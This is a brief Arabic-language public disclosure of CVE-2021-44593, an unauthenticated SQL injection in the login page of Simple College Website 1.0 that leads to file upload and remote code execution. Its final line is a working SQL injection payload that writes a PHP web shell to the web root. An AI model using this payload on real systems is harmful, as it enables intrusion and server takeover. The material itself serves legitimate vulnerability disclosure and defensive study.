
إفصاح عام وتقرير تفصيلي عن CVE-2021-44593، وهو حقن SQL غير مصادق عليه في موقع الكلية البسيط (Simple College Website) يؤدي إلى رفع ملفات تعسفي وتنفيذ تعليمات برمجية عن بُعد.
إفصاح عام عن CVE-2021-44593. ثغرة حقن SQL/رفع ملفات تعسفي/تنفيذ أوامر عن بُعد في موقع الكلية البسيط.
موقع الكلية البسيط الإصدار 1.0 معرّض لثغرة حقن SQL قائمة على UNION بدون مصادقة في معامل "username" في صفحة /admin/login.php، والتي يمكن استغلالها لاحقًا لرفع ملفات تعسفية والحصول على تنفيذ أوامر عن بُعد.
الدالة login() في admin_class.php
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -